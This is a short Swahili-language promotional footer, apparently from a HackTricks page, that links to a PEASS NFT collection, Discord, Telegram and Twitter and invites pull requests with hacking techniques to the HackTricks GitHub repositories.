* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>